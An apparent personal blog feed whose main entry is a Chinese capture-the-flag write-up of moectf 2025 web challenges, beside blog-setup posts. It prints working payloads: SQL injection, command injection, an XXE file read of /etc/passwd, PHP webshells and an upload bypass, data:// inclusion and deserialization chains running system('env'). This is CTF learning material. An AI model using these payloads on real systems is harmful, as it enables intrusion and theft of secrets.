<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <author>
    <name>aClosure</name>
  </author>
  <generator uri="https://hexo.io/">Hexo</generator>
  <id>http://example.com/</id>
  <link href="http://example.com/" rel="alternate"/>
  <link href="http://example.com/atom.xml" rel="self"/>
  <rights>All rights reserved 2026, aClosure</rights>
  <subtitle>おす～！</subtitle>
  <title>aClosure's奇妙的妙妙据点</title>
  <updated>2026-09-10T08:56:01.387Z</updated>
  <entry>
    <author>
      <name>aClosure</name>
    </author>
    <category term="ctfer" scheme="http://example.com/categories/ctfer/"/>
    <category term="omakase" scheme="http://example.com/tags/omakase/"/>
    <category term="dev" scheme="http://example.com/tags/dev/"/>
    <content>
      <![CDATA[<!-- more --><p>zako~zako~太天真了！</p><p>真的以为我现在就会传上来吗？</p>]]>
    </content>
    <id>http://example.com/2026/09/10/moe2026_web/</id>
    <link href="http://example.com/2026/09/10/moe2026_web/"/>
    <published>2026-09-10T08:54:07.000Z</published>
    <summary>你很想点进来看，渴求着今年的答案，是这样吗？</summary>
    <title>moectf 2026-web write-up</title>
    <updated>2026-09-10T08:56:01.387Z</updated>
  </entry>
  <entry>
    <author>
      <name>aClosure</name>
    </author>
    <category term="ctfer" scheme="http://example.com/categories/ctfer/"/>
    <category term="omakase" scheme="http://example.com/tags/omakase/"/>
    <category term="dev" scheme="http://example.com/tags/dev/"/>
    <content>
      <![CDATA[<!-- more --><h2 id="T1-万言启封咒">T1-万言启封咒</h2><p>考察一个f12“元素”标签的使用，更改输入框内文字为txt内容即可</p><h2 id="T2-初识金曦玄轨">T2-初识金曦玄轨</h2><p>考察bp等抓包，从模糊文字可知要访问/golden_trail页面，在响应头中即可看到flag</p><h2 id="T3-问剑石！篡天改命！">T3-问剑石！篡天改命！</h2><p>宗门弟子改命，查看源代码可知是用一个POST请求上传level，并用js上传manifest，各自改好POST上去即可</p><h2 id="T4-金曦破禁与七绝傀儡阵">T4-金曦破禁与七绝傀儡阵</h2><ol><li><p>磐石傀儡：get方法传参即可，直接?key=xdsec</p></li><li><p>织云傀儡:   post方法传参即可，注意不要直接复制（手打一下织云阁=第一</p></li><li><p>溯源傀儡：本地访问，更改XFF（X-Forwarded-For）为127.0.0.1即可</p></li><li><p>器灵傀儡：使用“moe browser”访问，更改useragent即可</p></li><li><p>心印傀儡：“以xt的身份认证user”，注意<strong>认证</strong>这两个字的含金量，所以加上cookie:user=xt</p></li><li><p>前尘傀儡：”从<a href="http://panshi/entry%E6%9D%A5%E2%80%9C%EF%BC%8C%E6%9B%B4%E6%94%B9Referer%E5%8D%B3%E5%8F%AF">http://panshi/entry来“，更改Referer即可</a></p></li><li><p>逆转傀儡：PUT一个”新生！“上去即可（别忘了<strong>感叹号</strong>，并且更改Content-Type）</p></li></ol><blockquote><p><u>PUT /rebirth HTTP/1.1 Host: 逆转傀儡 Content-Type: text/plain 新生！</u><br><u>关键：使用PUT方法；简单设置Content-Type；在Body中传递一个象征&quot;新生&quot;的信息</u></p></blockquote><h2 id="T5-打上门来！">T5-打上门来！</h2><p>别给首页那个破阵的文件骗了……那个是T4的，第一次做顺序放反了，被坑了好久（泣）</p><p>…/…/穿越回主目录下即可发现flag</p><h2 id="T6-藏经禁制？玄机初探！">T6-藏经禁制？玄机初探！</h2><p>mysql绕过登录</p><p>用户名字段大概是:</p><p>SELECT * FROM users WHERE username=‘$username’ AND password=‘$password’;（变量记得加$，md打不出来）</p><p>所以用户名输入admin’ or 1 = 1 # 以注释掉密码，之后密码字段随便填就好</p><h2 id="T7-灵蛛探穴与阴阳双生符">T7-灵蛛探穴与阴阳双生符</h2><p>”告知搜索引擎<strong>爬虫</strong>哪些页面可以抓取“，想到robots.txt，访问，发现”Disallow: /flag.php“</p><p>访问后发现要求a!=b,且md5值”相等“，想到md5碰撞，网上搜两个传参就好（传参直接跟?就好，不用/）</p><h2 id="T8-天衍真言，星图显圣">T8-天衍真言，星图显圣</h2><p>根据提示，可知考察sql注入，首先尝试admin’ or 1 = 1#，给出回显“Welcome admin”，并未登录</p><p>输入预期错误admin’ and 1=2#，显示登陆错误，实锤是sql注入</p><p>admin’ order by 3#起报错，说明就user和pwd两列</p><p>-1’ union select 1111,2222#，回显1111，说明pwd的字段是黑盒（注意，<strong>不要再用admin</strong>！！！admin存在就会一直报welcomeadmin，啥也拿不到）</p><p><em>爆库名</em>：-1’ union select database(),2222# ，发现在user库</p><p><em>爆表名</em>：-1’ union select table_name,2222 from information_schema.tables where table_schema = database() #，回显welcome flag</p><p>注意：“爆表名”时，where跟的是table_<strong>schema</strong>，且值写database，不要具体写user（待补充</p><p><em>爆列名</em>：-1’ union select column_name,2222 from information_schema.columns where table_schema = database() <u>and table_name =</u> <strong>‘flag’</strong> #，得到回显welcome value</p><blockquote><p>注意：flag要加双引号（泣），上面的原因也是这个</p></blockquote><p>爆字段：-1’ union select value,2 from flag #，得到flag</p><h2 id="T9-星墟禁制·天机问路">T9-星墟禁制·天机问路</h2><p><s>看网上wp，说是个SSRF漏洞，明天继续更（）</s></p><p>牛魔SSRF😭问了伟大的ds大人，告诉我这是命令注入，可以使用管道符|或者分号;来执行想要的命令</p><p>尝试www.baidu.com报错：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">`;; communications error to 10.43.0.10#53: connection refused`</span><br><span class="line"></span><br><span class="line">`;; communications error to 10.43.0.10#53: connection refused`</span><br><span class="line"></span><br><span class="line">`;; communications error to 10.43.0.10#53: connection refused`</span><br><span class="line"></span><br><span class="line">`;; no servers could be reached`</span><br></pre></td></tr></table></figure><p>经查找，有：</p><ul><li><p><strong><code>;;</code></strong> 是 Linux 下 <strong><code>dig</code></strong> 命令（DNS 查询工具）的专属输出格式。</p></li><li><p><strong><code>#53</code></strong> 是 DNS 服务的默认端口</p></li></ul><p>可知大概是网址被拼接到nslookup这种系统命令底下，故而可以使用管道符或者分号直接执行后头的命令</p><h2 id="T10-天机符阵">T10-天机符阵</h2><p>试图直接env逃课（），但是返回报错：</p><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">`<span class="tag">&lt;<span class="name">br</span> /&gt;</span><span class="tag">&lt;<span class="name">b</span>&gt;</span>Warning<span class="tag">&lt;/<span class="name">b</span>&gt;</span>: DOMDocument::loadXML(): Start tag expected, &#x27;<span class="symbol">&amp;lt;</span>&#x27; not found in Entity, line: 1 in <span class="tag">&lt;<span class="name">b</span>&gt;</span>/var/www/html/chapter10.php<span class="tag">&lt;/<span class="name">b</span>&gt;</span> on line <span class="tag">&lt;<span class="name">b</span>&gt;</span>17<span class="tag">&lt;/<span class="name">b</span>&gt;</span><span class="tag">&lt;<span class="name">br</span> /&gt;</span></span><br><span class="line">    </span><br><span class="line"><span class="tag">&lt;<span class="name">阵枢</span>&gt;</span>引魂玉<span class="tag">&lt;/<span class="name">阵枢</span>&gt;</span></span><br><span class="line">    </span><br><span class="line"><span class="tag">&lt;<span class="name">解析</span>&gt;</span>未定义<span class="tag">&lt;/<span class="name">解析</span>&gt;</span></span><br><span class="line">    </span><br><span class="line"><span class="tag">&lt;<span class="name">输出</span>&gt;</span>未定义<span class="tag">&lt;/<span class="name">输出</span>&gt;</span>`</span><br></pre></td></tr></table></figure><p>注意到后端使用 <code>DOMDocument::loadXML()</code> 解析用户输入，存在典型的 <strong>XXE（XML External Entity）漏洞</strong>，<s>速去helloctf补课</s></p><p>阵枢和输出未定义，这里尝试&lt;输出&gt;test&lt;/输出&gt;，发现可以正常得到回显（开心o(<em>￣▽￣</em>)ブ</p><p>尝试如下：</p><?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd"><?xml version="1.0"?><?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;root&gt; </span><br><span class="line">&lt;输出&gt;&amp;xxe;&lt;/输出&gt;</span><br><span class="line">&lt;/root&gt;</span><br></pre></td></tr></table></figure><p>发现有回显，说明目标确实为linux，且存在 <strong>任意文件读取（XXE/LFI）</strong> 漏洞。</p><p>又因为题目已经提示“文件在flag.txt中”，故用这个漏洞访问file:///var/www/html/flag.txt即可</p><h2 id="T11-千机变·破妄之眼">T11-千机变·破妄之眼</h2><p>“<strong>GET</strong> 参数名由<code>m,n,o,p,q</code>这五个字母组成（每个字母出现且仅出现一次），长度正好为 5，虽然不清楚字母的具体顺序，但是他知道<strong>参数名等于参数值</strong>才能进入”，故而先使用python生成120个payload，然后bp爆破即可（脚本等下试试</p><p>爆破这块有点诡异，不知道怎么回事bp总是不行…改天继续试，这里参考wp先跳过到find.php</p><p>访问flag.php被嘲讽🤬</p><p>考虑使用filter绕过查看注释：</p><blockquote><p>将./flag.php改为 php://filter/read=convert.base64-encode/resource=./flag.php 即可，解码后可以得到flag</p></blockquote><h2 id="T12-玉魄玄关·破妄">T12-玉魄玄关·破妄</h2><blockquote><p>这道题用于学习 <strong>蚁剑</strong> 的使用，请使用 <strong>蚁剑</strong> 完成本题</p></blockquote><p>发现后端：</p><?phphighlight_file(__FILE__);@eval($_POST['cmd'])和疯了一样，是一段密码cmd的一句话木马，蚁剑直接就连到服务器，env即可<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line">@<span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;cmd&#x27;</span>])</span><br></pre></td></tr></table></figure>~~和疯了一样~~，是一段密码cmd的一句话木马，蚁剑直接就连到服务器，env即可## T13-通幽关·灵纹诡影文件上传漏洞，但是只检查了文件的16进制头和后缀名，把上面的一句话木马修改文件头，上传后同T12## T14-御神关·补天玉碑> 省流：Apache有一个特殊文件，是什么呢？W1：由题得，web server是用的apache，而在1，2大版本号的Apache中，会从后往前解析文件类型，直到认识为止，所以可以考虑将那个cmd木马文件名改为**cmd.php.ra**r，从而绕过（）你也不过滤我压缩包啊（笑W2：“禁止上传攻伐符咒（如.php, .php5, .jsp, .asp等邪道术法）”，可知仍然是限制了上传类型，在Apache 服务器启用了 `AllowOverride` 选项，允许 `.htaccess` 文件覆盖默认配置的情况下，可以考虑 .htaccess 解析绕过，从而让特定类型/特定文件以php类型解析（当然，我们假设出题人是善良的）：<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;Files *.jpg&gt;</span><br><span class="line">ForceType application/x-httpd-php  # ForceType是AddType的等价形式，可以据此绕开不完全的关键词屏蔽</span><br><span class="line">&lt;/Files&gt;</span><br></pre></td></tr></table></figure>之后上传cmd.php.jpg即可## T15-归真关·竞时净魔> 符文上传后将进行「重命名净化」，魔气会快速清除违规符文，请把握时机！可知本题考查条件竞争下的文件上传，又发现：> 图片上传至/uploads故而可知，访问uploads目录下上传的图片即可，这里使用bp同时无限上传和访问，然后yukuri地用蚁剑连就好了但是我们尝试用上面的cmd木马，十分钟后无果，询问ds，发现条件竞争还要输密码的话，基本就别想命中了（泣），所以我们改用木马：<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">fputs</span>(<span class="title function_ invoke__">fopen</span>(<span class="string">&#x27;pass.php&#x27;</span>,<span class="string">&#x27;w&#x27;</span>),<span class="string">&#x27;&lt;?php @eval($_POST[&#x27;</span>cmd<span class="string">&#x27;]);?&gt;&#x27;</span>);   </span><br><span class="line">   <span class="comment"># 不要用phpinfo，它只是个探针，没法蚁剑</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>用它创建一个pass.php在上传的目录下，并w（write）后面的内容（这种情况apache只会删除你传上来的原文件，pass.php得以保留）不知道为什么始终不行，明天继续试## T16-**昆仑星途**~~牛魔这段是重写的，typedown什么垃圾编辑器滚一边去吧(ノ｀Д)ノ~~打开后发现是一段php：<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>] . <span class="string">&quot;.php&quot;</span>);</span><br></pre></td></tr></table></figure>打开附件的php.ini发现：<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">[PHP]</span></span><br><span class="line"><span class="attr">allow_url_fopen</span> = <span class="literal">On</span></span><br><span class="line"><span class="attr">allow_url_include</span> = <span class="literal">On</span></span><br></pre></td></tr></table></figure>在这两者都启用的情况下，可以使用data://伪协议，通过文件包含漏洞找flag：故输入/?file=data://text/plain,<?php system('env') ?>，结果牛魔什么都没有，出题人坏🤬<p>这次尝试ls /，发现一个随机生成的flag文件，cat /flag-一堆.txt即可</p><h2 id="T17-星骸迷阵·神念重构">T17-<strong>星骸迷阵·神念重构</strong></h2><p>发现php：</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">A</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$a</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable language_">$this</span>-&gt;a);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;a&#x27;</span>])) &#123;</span><br><span class="line">    <span class="title function_ invoke__">unserialize</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;a&#x27;</span>]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>是个反序列化漏洞利用，unserialize结束时对象自动销毁，会触发__destruct()这个魔术方法，故而构造：</p><p>/?a=O:1:“A”:1:{s:1:“a”;s:13:“system(‘env’);”;}即可得到flag，出题人好😋</p><h2 id="T18-万卷诡阁·功法连环">T18-<strong>万卷诡阁·功法连环</strong></h2><p>打开后发现是一段php，典型的pop链构造：</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">PersonA</span> </span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$name</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="variable">$name</span>=<span class="variable language_">$this</span>-&gt;name;</span><br><span class="line">        <span class="variable">$name</span>-&gt;<span class="title function_ invoke__">work</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">PersonB</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$name</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">work</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable">$name</span>=<span class="variable language_">$this</span>-&gt;name;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$name</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;person&#x27;</span>])) &#123;</span><br><span class="line">    <span class="title function_ invoke__">unserialize</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;person&#x27;</span>]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>分析可知：WeakPoint: eval($name)</p><p>?person=_TOARUvalue -&gt; unseri -&gt;__wakeup:<br>将person对象里的name属性提取出来，赋给PA里的name属性，再用name属性调用PB的work()</p><p>PB：这个name和上面的不一样，PA的name属性里头还要包括一个name属性，说明PA的name为O，即person为两层<br>顺便一说分析出来PA的name最里头（即PB的name属性）就是要执行的命令</p><p>这里我们构造如下脚本：</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">PersonB</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$name</span>;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">PersonA</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$name</span>;   <span class="comment">#问我为什么不用private？懒得用魔术方法再整一遍行吧（</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$b</span> = <span class="keyword">new</span> <span class="title function_ invoke__">PersonB</span>();</span><br><span class="line"><span class="variable">$b</span> -&gt; name = <span class="string">&#x27;system(&quot;env&quot;);&#x27;</span>;  <span class="comment">#别忘了system()后头的分号！！！</span></span><br><span class="line"><span class="variable">$payload</span> = <span class="keyword">new</span> <span class="title function_ invoke__">PersonA</span>();</span><br><span class="line"><span class="variable">$payload</span> -&gt; name = <span class="variable">$b</span>;</span><br><span class="line"><span class="keyword">echo</span> (<span class="title function_ invoke__">serialize</span>(<span class="variable">$payload</span>));</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>之后得到</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:<span class="number">7</span>:<span class="string">&quot;PersonA&quot;</span>:<span class="number">1</span>:&#123;s:<span class="number">4</span>:<span class="string">&quot;name&quot;</span>;O:<span class="number">7</span>:<span class="string">&quot;PersonB&quot;</span>:<span class="number">1</span>:&#123;s:<span class="number">4</span>:<span class="string">&quot;name&quot;</span>;s:<span class="number">14</span>:<span class="string">&quot;system(&quot;</span>env<span class="string">&quot;);&quot;</span>;&#125;&#125;</span><br></pre></td></tr></table></figure><p>将外层的name改成私有属性即可，s:13:“%00PersonA%00name” 注意一个%00只占一个位置</p><h2 id="T19-星穹真相·补天归源">T19-<strong>星穹真相·补天归源</strong></h2><p>笔者看了题半天，感觉要累死了，下午/明天继续</p>]]>
    </content>
    <id>http://example.com/2026/09/05/moe2025_web/</id>
    <link href="http://example.com/2026/09/05/moe2025_web/"/>
    <published>2026-09-05T14:54:07.000Z</published>
    <summary>看web看得头大……遂决定先把moe25和26的wp传了再说（看tsctf的题好难/(ㄒoㄒ)/~~</summary>
    <title>moectf 2025-web write-up</title>
    <updated>2026-09-10T13:09:17.914Z</updated>
  </entry>
  <entry>
    <author>
      <name>aClosure</name>
    </author>
    <category term="分类" scheme="http://example.com/categories/%E5%88%86%E7%B1%BB/"/>
    <category term="omakase" scheme="http://example.com/tags/omakase/"/>
    <category term="dev" scheme="http://example.com/tags/dev/"/>
    <content>
      <![CDATA[<!-- more --><h2 id="1-搭建背景">1.搭建背景</h2><blockquote><p>可怜的clo酱自己看不懂moectf的wp，遂先来自己搭个blog用来以后写~~（才不是自己懒得学py和js所以先用这个摸鱼呢）~~</p></blockquote><p>clo酱要开始微笑调查的ctfer之路了！（笑）</p><p>clo酱总算要准备写点gal的杂谈在网上了！</p><p><s>clo酱 要用这个熟悉下git（）</s></p><h2 id="2-施工计划">2.施工计划</h2><pre><code> &lt;!-- more --&gt;</code></pre><ul><li><p>[ ] 上线一个分类系统~~（然后写gal杂谈摸鱼）</p></li><li><p>[ ] 给主页加一个好看的背景图片</p></li><li><p>[ ] 内嵌一个qq音乐的播放器（问就是wyy黑，尽管自己wyy都8级了）</p></li><li><p>[ ] 给blog里头嵌入图片</p></li><li><p>[ ] 上线一个评论区</p></li><li><p>[ ] 上线一下文档发布时间</p></li><li><p>[ ] 想办法搞个看板娘</p></li><li><p>[ ] 和网友们讨token吃（）</p></li></ul><h2 id="3-施工简报">3.施工简报</h2><blockquote><p>special：感谢知乎大佬“枫叶”的文章[从零开始搭建个人博客（超详细）](<a href="https://zhuanlan.zhihu.com/p/102592286">(10 封私信) 从零开始搭建个人博客（超详细） - 知乎</a>)，省去了不少看hexo文档的工夫（谢谢喵）</p></blockquote><p>2026-09-10更新：</p><p>改用了flatpaper这个主题，主题的demo见<a href="https://flatpaper.nep.me/">这里</a>。</p><p>感谢<a href="https://homulilly.com/">Homulilly的圆神博客</a>让我知道了这个主题，翻修后相比原来简陋的next真是天差地别（笑</p>]]>
    </content>
    <id>http://example.com/2026/08/12/%E4%BB%8E%E9%9B%B6%EF%BC%88%EF%BC%9F%EF%BC%89%E5%BC%80%E5%A7%8B%E7%9A%84blog%E6%90%AD%E5%BB%BA/</id>
    <link href="http://example.com/2026/08/12/%E4%BB%8E%E9%9B%B6%EF%BC%88%EF%BC%9F%EF%BC%89%E5%BC%80%E5%A7%8B%E7%9A%84blog%E6%90%AD%E5%BB%BA/"/>
    <published>2026-08-12T05:04:12.000Z</published>
    <summary>点击标题查看谢谢喵</summary>
    <title>从零开始（？）的blog搭建</title>
    <updated>2026-09-10T13:07:27.494Z</updated>
  </entry>
  <entry>
    <author>
      <name>aClosure</name>
    </author>
    <content>
      <![CDATA[<p>Welcome to <a href="https://hexo.io/">Hexo</a>! This is your very first post. Check <a href="https://hexo.io/docs/">documentation</a> for more info. If you get any problems when using Hexo, you can find the answer in <a href="https://hexo.io/docs/troubleshooting.html">troubleshooting</a> or you can ask me on <a href="https://github.com/hexojs/hexo/issues">GitHub</a>.</p><h2 id="Quick-Start">Quick Start</h2><h3 id="Create-a-new-post">Create a new post</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo new <span class="string">&quot;My New Post&quot;</span></span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/writing.html">Writing</a></p><h3 id="Run-server">Run server</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo server</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/server.html">Server</a></p><h3 id="Generate-static-files">Generate static files</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo generate</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/generating.html">Generating</a></p><h3 id="Deploy-to-remote-sites">Deploy to remote sites</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo deploy</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/one-command-deployment.html">Deployment</a></p>]]>
    </content>
    <id>http://example.com/2026/08/11/hello-world/</id>
    <link href="http://example.com/2026/08/11/hello-world/"/>
    <published>2026-08-11T14:17:40.826Z</published>
    <summary>
      <![CDATA[<p>Welcome to <a href="https://hexo.io/">Hexo</a>! This is your very first post. Check <a href="https://hexo.io/docs/">documentation</a> for]]>
    </summary>
    <title>Hello World</title>
    <updated>2026-08-11T14:17:27.952Z</updated>
  </entry>
</feed>
